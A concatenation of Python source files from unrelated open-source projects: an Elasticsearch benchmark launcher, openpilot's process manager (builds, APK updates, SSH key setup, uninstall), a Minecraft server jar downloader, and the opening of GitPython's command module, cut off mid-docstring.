binary_path = node_configuration.binary_path
self.binary_paths[node_name] = binary_path
p = self._start_process(cmd="docker-compose -f %s up" % binary_path, node_name=node_name)
# only support a subset of telemetry for Docker hosts (specifically, we do not allow users to enable any devices)
node_telemetry = [
telemetry.DiskIo(self.metrics_store, len(node_configurations)),
telemetry.NodeEnvironmentInfo(self.metrics_store)
]
t = telemetry.Telemetry(devices=node_telemetry)
nodes.append(cluster.Node(p, host_name, node_name, t))
return nodes
def _start_process(self, cmd, node_name):
return _start(subprocess.Popen(shlex.split(cmd),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL), node_name)
def stop(self, nodes):
if self.keep_running:
self.logger.info("Keeping Docker container running.")
else:
self.logger.info("Stopping Docker container")
for node in nodes:
node.telemetry.detach_from_node(node, running=True)
process.run_subprocess_with_logging("docker-compose -f %s down" % self.binary_paths[node.node_name])
node.telemetry.detach_from_node(node, running=False)
class ExternalLauncher:
def __init__(self, cfg, metrics_store, client_factory_class=client.EsClientFactory):
self.cfg = cfg
self.metrics_store = metrics_store
self.client_factory = client_factory_class
self.logger = logging.getLogger(__name__)
def start(self, node_configurations=None):
hosts = self.cfg.opts("client", "hosts").default
client_options = self.cfg.opts("client", "options").default
es = self.client_factory(hosts, client_options).create()
# cannot enable custom telemetry devices here
t = telemetry.Telemetry(devices=[
# This is needed to actually populate the nodes
telemetry.ClusterMetaDataInfo(es),
# will gather node specific meta-data for all nodes
telemetry.ExternalEnvironmentInfo(es, self.metrics_store),
])
# We create a pseudo-cluster here to get information about all nodes.
# cluster nodes will be populated by the external environment info telemetry device. We cannot know this upfront.
c = cluster.Cluster(hosts, [], t)
user_defined_version = self.cfg.opts("mechanic", "distribution.version", mandatory=False)
distribution_version = es.info()["version"]["number"]
if not user_defined_version or user_defined_version.strip() == "":
self.logger.info("Distribution version was not specified by user. Rally-determined version is [%s]", distribution_version)
self.cfg.add(config.Scope.benchmark, "mechanic", "distribution.version", distribution_version)
elif user_defined_version != distribution_version:
self.logger.warning("Distribution version '%s' on command line differs from actual cluster version '%s'.",
user_defined_version, distribution_version)
t.attach_to_cluster(c)
return c.nodes
def stop(self, nodes):
# nothing to do here, externally provisioned clusters / nodes don't have any specific telemetry devices attached.
pass
class InProcessLauncher:
"""
Launcher is responsible for starting and stopping the benchmark candidate.
"""
PROCESS_WAIT_TIMEOUT_SECONDS = 90.0
def __init__(self, cfg, metrics_store, races_root_dir, clock=time.Clock):
self.cfg = cfg
self.metrics_store = metrics_store
self._clock = clock
self.races_root_dir = races_root_dir
self.keep_running = self.cfg.opts("mechanic", "keep.running")
self.logger = logging.getLogger(__name__)
def start(self, node_configurations):
# we're very specific which nodes we kill as there is potentially also an Elasticsearch based metrics store running on this machine
# The only specific trait of a Rally-related process is that is started "somewhere" in the races root directory.
#
# We also do this only once per host otherwise we would kill instances that we've just launched.
process.kill_running_es_instances(self.races_root_dir)
node_count_on_host = len(node_configurations)
return [self._start_node(node_configuration, node_count_on_host) for node_configuration in node_configurations]
def _start_node(self, node_configuration, node_count_on_host):
host_name = node_configuration.ip
node_name = node_configuration.node_name
car = node_configuration.car
binary_path = node_configuration.binary_path
data_paths = node_configuration.data_paths
node_telemetry_dir = "%s/telemetry" % node_configuration.node_root_path
java_major_version, java_home = java_resolver.java_home(car, self.cfg)
self.logger.info("Starting node [%s] based on car [%s].", node_name, car)
enabled_devices = self.cfg.opts("mechanic", "telemetry.devices")
telemetry_params = self.cfg.opts("mechanic", "telemetry.params")
node_telemetry = [
telemetry.DiskIo(self.metrics_store, node_count_on_host),
telemetry.NodeEnvironmentInfo(self.metrics_store),
telemetry.IndexSize(data_paths, self.metrics_store),
telemetry.MergeParts(self.metrics_store, node_configuration.log_path),
telemetry.StartupTime(self.metrics_store),
]
t = telemetry.Telemetry(enabled_devices, devices=node_telemetry)
env = self._prepare_env(car, node_name, java_home, t)
t.on_pre_node_start(node_name)
node_process = self._start_process(env, node_name, binary_path)
node = cluster.Node(node_process, host_name, node_name, t)
self.logger.info("Attaching telemetry devices to node [%s].", node_name)
t.attach_to_node(node)
return node
def _prepare_env(self, car, node_name, java_home, t):
env = {}
env.update(os.environ)
env.update(car.env)
self._set_env(env, "PATH", os.path.join(java_home, "bin"), separator=os.pathsep)
# Don't merge here!
env["JAVA_HOME"] = java_home
self.logger.debug("env for [%s]: %s", node_name, str(env))
return env
def _set_env(self, env, k, v, separator=' '):
if v is not None:
if k not in env:
env[k] = v
else: # merge
env[k] = v + separator + env[k]
def _start_process(self, env, node_name, binary_path):
if os.geteuid() == 0:
raise exceptions.LaunchError("Cannot launch Elasticsearch as root. Please run Rally as a non-root user.")
os.chdir(binary_path)
cmd = ["bin/elasticsearch"]
return _start(subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL, env=env), node_name)
def stop(self, nodes):
if self.keep_running:
self.logger.info("Keeping [%d] nodes on this host running.", len(nodes))
else:
self.logger.info("Shutting down [%d] nodes on this host.", len(nodes))
for node in nodes:
process = node.process
node_name = node.node_name
node.telemetry.detach_from_node(node, running=True)
if not self.keep_running:
stop_watch = self._clock.stop_watch()
stop_watch.start()
try:
os.kill(process.pid, signal.SIGINT)
process.wait(10.0)
self.logger.info("Done shutdown node [%s] in [%.1f] s.", node_name, stop_watch.split_time())
except ProcessLookupError:
self.logger.warning("No process found with PID [%s] for node [%s]", process.pid, node_name)
except subprocess.TimeoutExpired:
# kill -9
self.logger.warning("Node [%s] did not shut down after 10 seconds; now kill -QUIT node, to see threads:", node_name)
try:
os.kill(process.pid, signal.SIGQUIT)
except OSError:
self.logger.warning("No process found with PID [%s] for node [%s]", process.pid, node_name)
break
try:
process.wait(120.0)
self.logger.info("Done shutdown node [%s] in [%.1f] s.", node_name, stop_watch.split_time())
break
except subprocess.TimeoutExpired:
pass
self.logger.info("kill -KILL node [%s]", node_name)
try:
process.kill()
except ProcessLookupError:
self.logger.warning("No process found with PID [%s] for node [%s]", process.pid, node_name)
node.telemetry.detach_from_node(node, running=False)
|
manager.py
|
#!/usr/bin/env python2.7
import os
import sys
import fcntl
import errno
import signal
import subprocess
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat)
except (OSError, IOError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
is_neos = os.path.isfile("/init.qcom.rc")
neos_update_required = False
if is_neos:
version = int(open("/VERSION").read()) if os.path.isfile("/VERSION") else 0
revision = int(open("/REVISION").read()) if version >= 10 else 0 # Revision only present in NEOS 10 and up
neos_update_required = version < 10 or (version == 10 and revision != 3)
if neos_update_required:
# update continue.sh before updating NEOS
if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
from shutil import copyfile
copyfile(os.path.join(BASEDIR, "scripts", "continue.sh"), "/data/data/com.termux/files/continue.sh")
# run the updater
print("Starting NEOS updater")
subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
updater_dir = os.path.join(BASEDIR, "installer", "updater")
manifest_path = os.path.realpath(os.path.join(updater_dir, "update.json"))
os.system(os.path.join(updater_dir, "updater") + " file://" + manifest_path)
raise Exception("NEOS outdated")
elif os.path.isdir("/data/neoupdate"):
from shutil import rmtree
rmtree("/data/neoupdate")
unblock_stdout()
import glob
import shutil
import hashlib
import importlib
import re
import stat
import subprocess
import traceback
from multiprocessing import Process
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.file_helpers import atomic_write_in_dir_neos
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
#"mapd": "selfdrive.mapd.mapd",
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./start.py"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": ("selfdrive/locationd", ["./paramsd"]),
"visiond": ("selfdrive/visiond", ["./visiond"]),
"sensord": ("selfdrive/sensord", ["./start_sensord.py"]),
"gpsd": ("selfdrive/sensord", ["./start_gpsd.py"]),
"updated": "selfdrive.updated",
}
daemon_processes = {
"athenad": "selfdrive.athena.athenad",
}
android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'ui',
'updated',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'sensord',
'radard',
'calibrationd',
'paramsd',
'visiond',
'proclogd',
'ubloxd',
'gpsd',
#'mapd',
'deleter',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def launcher(proc):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# terminate the zmq context since we forked
import zmq
zmq.Context.instance().term()
# exec the process
mod.main()
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
# can't install the crash handler becuase sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name, params):
proc = daemon_processes[name]
pid_param = name.capitalize() + 'Pid'
pid = params.get(pid_param)
if pid is not None:
try:
os.kill(int(pid), 0)
# process is running (kill is a poorly-named system call)
return
except OSError:
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc],
cwd='/',
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
else:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
# give it 5 seconds to die
running[name].join(5.0)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def pm_apply_packages(cmd):
for p in android_packages:
system("pm %s %s" % (cmd, p))
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
def system(cmd):
try:
cloudlog.info("running %s" % cmd)
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
cloudlog.event("running failed",
cmd=e.cmd,
output=e.output[-1024:],
returncode=e.returncode)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock(service_list['thermal'].port)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p, params)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
system("am start -n ai.comma.plus.frame/.MainActivity")
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in car_started_processes:
kill_managed_process(p)
# check the status of all processes, did any of them die?
#running_list = [" running %s %s" % (p, running[p]) for p in running]
#cloudlog.debug('\n'.join(running_list))
# is this still needed?
if params.get("DoUninstall") == "1":
break
def get_installed_apks():
dat = subprocess.check_output(["pm", "list", "packages", "-f"]).strip().split("\n")
ret = {}
for x in dat:
if x.startswith("package:"):
v,k = x.split("package:")[1].split("=")
ret[k] = v
return ret
def install_apk(path):
# can only install from world readable path
install_path = "/sdcard/%s" % os.path.basename(path)
shutil.copyfile(path, install_path)
ret = subprocess.call(["pm", "install", "-r", install_path])
os.remove(install_path)
return ret == 0
def update_apks():
# install apks
installed = get_installed_apks()
install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
for apk in install_apks:
app = os.path.basename(apk)[:-4]
if app not in installed:
installed[app] = None
cloudlog.info("installed apks %s" % (str(installed), ))
for app in installed.keys():
apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
if not os.path.exists(apk_path):
continue
h1 = hashlib.sha1(open(apk_path).read()).hexdigest()
h2 = None
if installed[app] is not None:
h2 = hashlib.sha1(open(installed[app]).read()).hexdigest()
cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))
if h2 is None or h1 != h2:
cloudlog.info("installing %s" % app)
success = install_apk(apk_path)
if not success:
cloudlog.info("needing to uninstall %s" % app)
system("pm uninstall %s" % app)
success = install_apk(apk_path)
assert success
def update_ssh():
ssh_home_dirpath = "/system/comma/home/.ssh/"
auth_keys_path = os.path.join(ssh_home_dirpath, "authorized_keys")
auth_keys_persist_path = os.path.join(ssh_home_dirpath, "authorized_keys.persist")
auth_keys_mode = stat.S_IREAD | stat.S_IWRITE
params = Params()
github_keys = params.get("GithubSshKeys") or ''
old_keys = open(auth_keys_path).read()
has_persisted_keys = os.path.exists(auth_keys_persist_path)
if has_persisted_keys:
persisted_keys = open(auth_keys_persist_path).read()
else:
# add host filter
persisted_keys = re.sub(r'^(?!.+?from.+? )(ssh|ecdsa)', 'from="10.0.0.0/8,172.16.0.0/12,192.168.0.0/16" \\1', old_keys, flags=re.MULTILINE)
new_keys = persisted_keys + '\n' + github_keys
if has_persisted_keys and new_keys == old_keys and os.stat(auth_keys_path)[stat.ST_MODE] == auth_keys_mode:
# nothing to do - let's avoid remount
return
try:
subprocess.check_call(["mount", "-o", "rw,remount", "/system"])
if not has_persisted_keys:
atomic_write_in_dir_neos(auth_keys_persist_path, persisted_keys, mode=auth_keys_mode)
atomic_write_in_dir_neos(auth_keys_path, new_keys, mode=auth_keys_mode)
finally:
try:
subprocess.check_call(["mount", "-o", "ro,remount", "/system"])
except:
cloudlog.exception("Failed to remount as read-only")
# this can fail due to "Device busy" - reboot if so
os.system("reboot")
raise RuntimeError
def manager_update():
update_ssh()
update_apks()
def manager_prepare():
# build cereal first
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
for p in managed_processes:
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
os.system("service call power 16 i32 0 s16 recovery i32 1")
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
if os.getenv("NOLOG") is not None:
del managed_processes['loggerd']
del managed_processes['tombstoned']
if os.getenv("NOUPLOAD") is not None:
del managed_processes['uploader']
if os.getenv("NOVISION") is not None:
del managed_processes['visiond']
if os.getenv("LEAN") is not None:
del managed_processes['uploader']
del managed_processes['loggerd']
del managed_processes['logmessaged']
del managed_processes['logcatd']
del managed_processes['tombstoned']
del managed_processes['proclogd']
if os.getenv("NOCONTROL") is not None:
del managed_processes['controlsd']
del managed_processes['plannerd']
del managed_processes['radard']
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process) # pylint: disable=no-member
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("IsFcwEnabled") is None:
params.put("IsFcwEnabled", "1")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("IsUploadRawEnabled") is None:
params.put("IsUploadRawEnabled", "1")
if params.get("IsUploadVideoOverCellularEnabled") is None:
params.put("IsUploadVideoOverCellularEnabled", "1")
if params.get("IsDriverMonitoringEnabled") is None:
params.put("IsDriverMonitoringEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
if params.get("LimitSetSpeedNeural") is None:
params.put("LimitSetSpeedNeural", "0")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# put something on screen while we set things up
if os.getenv("PREPAREONLY") is not None:
spinner_proc = None
else:
spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
close_fds=True)
try:
manager_update()
manager_init()
manager_prepare()
finally:
if spinner_proc:
spinner_proc.terminate()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall") == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
download.py
|
from py_minecraft_server.utils import validate_version, soupify_url, get_vanilla_url, get_forge_url
from py_minecraft_server import logger
import asyncio
import threading
import time
import urllib.request
import os
import shutil
async def download_jar(version: str, save_location: str, is_forge: bool, create_dirs: bool = False,
overwrite: bool = False, *copy_locations):
"""
Downloads a jar to the desired location
:param version: The version of minecraft to get a server jar for
:param save_location: The location to save the jar too
:param is_forge: True if the jar is meant to be a forge jar
:param create_dirs: Weather or not to make the directory if it doesnt exist
:param overwrite: Delete a file in save_location if present
:param copy_locations: Additional locations to copy the downloaded file to, create_dirs will apply to copy_locations
"""
# validate version and save location
version = validate_version(version)
if not save_location.endswith(".jar"):
raise ValueError(f"Illegal save location, must be a .jar file: {save_location}")
if os.path.exists(save_location):
if not overwrite:
raise ValueError(f"Illegal save location, must be empty: {save_location}")
logger.warning(f"Deleting file @{os.path.abspath(save_location)} because overwrite={overwrite}")
os.remove(save_location)
if create_dirs:
os.makedirs(os.path.dirname(save_location), exist_ok=True)
if is_forge:
try:
download_url = soupify_url(get_forge_url(version)).find(
"div", {"class": "link-boosted"}).find("a").get("href").split("url=")[1]
except AttributeError:
raise ValueError(f"Illegal forge version, no forge download for version {version}")
else:
download_url = soupify_url(get_vanilla_url(version)).find(
"a", {"download": f"minecraft_server-{version}.jar"}).get("href")
logger.debug(f"Async download started from {download_url} to {save_location}")
await thread_download(download_url, save_location)
if copy_locations:
logger.debug(f"Copying downloaded jar file to a server")
for location in copy_locations:
copy_file(save_location, location)
async def thread_download(url: str, save_location: str):
"""Threads a download from urllib.request.urlretreive"""
t = threading.Thread(target=urllib.request.urlretrieve, args=(url, save_location), daemon=True)
t.start()
start_time = time.time()
while t.is_alive():
await asyncio.sleep(1)
logger.debug(f"Download from {url} to {save_location} completed in {(time.time() - start_time):.2f}s")
def copy_file(src: str, dst: str, create_dirs: bool = False):
"""Copy a file from src to dst allowing for dirs to be created"""
if create_dirs:
os.makedirs(os.path.basename(dst), exist_ok=True)
if os.path.exists(dst):
raise ValueError(f"Destination not empty {dst}")
if not os.path.isfile(src):
raise ValueError(f"Source is not a file {src}")
logger.debug(f"Copying {src} to {dst}")
shutil.copy2(src, dst)
|
cmd.py
|
# cmd.py
# Copyright (C) 2008, 2009 Michael Trier (mtrier@gmail.com) and contributors
#
# This module is part of GitPython and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
import os
import os.path
import sys
import select
import logging
import threading
import errno
import mmap
from contextlib import contextmanager
from subprocess import (
call,
Popen,
PIPE
)
from .util import (
LazyMixin,
stream_copy,
WaitGroup
)
from .exc import GitCommandError
from git.compat import (
string_types,
defenc,
PY3,
bchr,
# just to satisfy flake8 on py3
unicode
)
execute_kwargs = ('istream', 'with_keep_cwd', 'with_extended_output',
'with_exceptions', 'as_process', 'stdout_as_string',
'output_stream')
log = logging.getLogger('git.cmd')
__all__ = ('Git', )
if sys.platform != 'win32':
WindowsError = OSError
if PY3:
_bchr = bchr
else:
def _bchr(c):
return c
# get custom byte character handling
# ==============================================================================
## @name Utilities
# ------------------------------------------------------------------------------
# Documentation
## @{
def handle_process_output(process, stdout_handler, stderr_handler, finalizer):
"""Registers for notifications to lean that process output is ready to read, and dispatches lines to
the respective line handlers. We are able to handle carriage returns in case progress is sent by that
mean. For performance reasons, we only apply this to stderr.
This function returns once the finalizer returns
:return: result of finalizer
:param process: subprocess.Popen instance
:param stdout_handler: f(stdout_line_string), or None
:param stderr_hanlder: f(stderr_line_string), or None
:param finalizer: f(proc) - wait for proc to finish"""
def parse_lines_from_buffer(fno, buf):
line = b''
bi = 0
lb = len(buf)
while bi < lb:
char = _bchr(buf[bi])
bi += 1
if char in (b'\r', b'\n') and line:
yield bi, line
line = b''
else:
line += char
# END process parsed line
# END while file is not done reading
# end
def read_lines_from_fno(fno, last_buf_list):
buf = os.read(fno, mmap.PAGESIZE)
buf = last_buf_list[0] + buf
bi = 0
for bi, line in parse_lines_from_buffer(fno, buf):
yield line
# for each line to parse from the buffer
# keep remainder
last_buf_list[0] = buf[bi:]
def dispatch_single_line(line, handler):
line = line.decode(defenc)
if line and handler:
try:
handler(line)
except Exception:
# Keep reading, have to pump the lines empty nontheless
log.error("Line handler exception on line: %s", line, exc_info=True)
# end
# end dispatch helper
# end single line helper
def dispatch_lines(fno, handler, buf_list):
lc = 0
for line in read_lines_from_fno(fno, buf_list):
dispatch_single_line(line, handler)
lc += 1
# for each line
return lc
# end
def deplete_buffer(fno, handler, buf_list, wg=None):
while True:
line_count = dispatch_lines(fno, handler, buf_list)
if line_count == 0:
break
# end deplete buffer
if buf_list[0]:
dispatch_single_line(buf_list[0], handler)
# end
if wg:
wg.done()
# end
fdmap = {process.stdout.fileno(): (stdout_handler, [b'']),
process.stderr.fileno(): (stderr_handler, [b''])}
if hasattr(select, 'poll'):
# poll is preferred, as select is limited to file handles up to 1024 ... . This could otherwise be
# an issue for us, as it matters how many handles our own process has
poll = select.poll()
READ_ONLY = select.POLLIN | select.POLLPRI | select.POLLHUP | select.POLLERR
CLOSED = select.POLLHUP | select.POLLERR
poll.register(process.stdout, READ_ONLY)
poll.register(process.stderr, READ_ONLY)
closed_streams = set()
while True:
# no timeout
try:
poll_result = poll.poll()
except select.error as e:
if e.args[0] == errno.EINTR:
continue
raise
# end handle poll exception
for fd, result in poll_result:
if result & CLOSED:
closed_streams.add(fd)
else:
dispatch_lines(fd, *fdmap[fd])
# end handle closed stream
# end for each poll-result tuple
if len(closed_streams) == len(fdmap):
break
# end its all done
# end endless loop
# Depelete all remaining buffers
for fno, (handler, buf_list) in fdmap.items():
deplete_buffer(fno, handler, buf_list)
# end for each file handle
for fno in fdmap.keys():
poll.unregister(fno)
# end don't forget to unregister !
else:
# Oh ... probably we are on windows. select.select() can only handle sockets, we have files
# The only reliable way to do this now is to use threads and wait for both to finish
# Since the finalizer is expected to wait, we don't have to introduce our own wait primitive
# NO: It's not enough unfortunately, and we will have to sync the threads
wg = WaitGroup()
for fno, (handler, buf_list) in fdmap.items():
wg.add(1)
t = threading.Thread(target=lambda: deplete_buffer(fno, handler, buf_list, wg))
t.start()
# end
# NOTE: Just joining threads can possibly fail as there is a gap between .start() and when it's
# actually started, which could make the wait() call to just return because the thread is not yet
# active
wg.wait()
# end
return finalizer(process)
def dashify(string):
return string.replace('_', '-')
## -- End Utilities -- @}
class Git(LazyMixin):
"""
The Git class manages communication with the Git binary.
It provides a convenient interface to calling the Git binary, such as in::
g = Git( git_dir )
g.init() # calls 'git init' program
rval = g.ls_files() # calls 'git ls-files' program
``Debugging``
Set the GIT_PYTHON_TRACE environment variable print each invocation
of the command to stdout.
Set its value to 'full' to see details about the returned values.
"""
__slots__ = ("_working_dir", "cat_file_all", "cat_file_header", "_version_info",
"_git_options", "_environment")
# CONFIGURATION
# The size in bytes read from stdout when copying git's output to another stream
max_chunk_size = 1024 * 64
git_exec_name = "git" # default that should work on linux and windows
git_exec_name_win = "git.cmd" # alternate command name, windows only
# Enables debugging of GitPython's git commands
GIT_PYTHON_TRACE = os.environ.get("GIT_PYTHON_TRACE", False)
# Provide the full path to the git executable. Otherwise it assumes git is in the path
_git_exec_env_var = "GIT_PYTHON_GIT_EXECUTABLE"
GIT_PYTHON_GIT_EXECUTABLE = os.environ.get(_git_exec_env_var, git_exec_name)
class AutoInterrupt(object):
"""Kill/Interrupt the stored process instance once this instance goes out of scope. It is
used to prevent processes piling up in case iterators stop reading.
Besides all attributes are wired through to the contained process object.
The wait method was overridden to perform automatic status code checking
and possibly raise."""
__slots__ = ("proc", "args")
def __init__(self, proc, args):
self.proc = proc
self.args = args
def __del__(self):
if self.proc is None:
return
proc = self.proc
self.proc = None
if proc.stdin:
proc.stdin.close()
proc.stdout.close()
proc.stderr.close()
# did the process finish already so we have a return code ?
if proc.poll() is not None:
return
# can be that nothing really exists anymore ...
if os is None:
return
# try to kill it
try:
os.kill(proc.pid, 2) # interrupt signal
proc.wait() # ensure process goes away
except (OSError, WindowsError):
pass # ignore error when process already died
except AttributeError:
# try windows
# for some reason, providing None for stdout/stderr still prints something. This is why
# we simply use the shell and redirect to nul. Its slower than CreateProcess, question
# is whether we really want to see all these messages. Its annoying no matter what.
call(("TASKKILL /F /T /PID %s 2>nul 1>nul" % str(proc.pid)), shell=True)
# END exception handling
def __getattr__(self, attr):
return getattr(self.proc, attr)
def wait(self):
"""Wait for the process and return its status code.
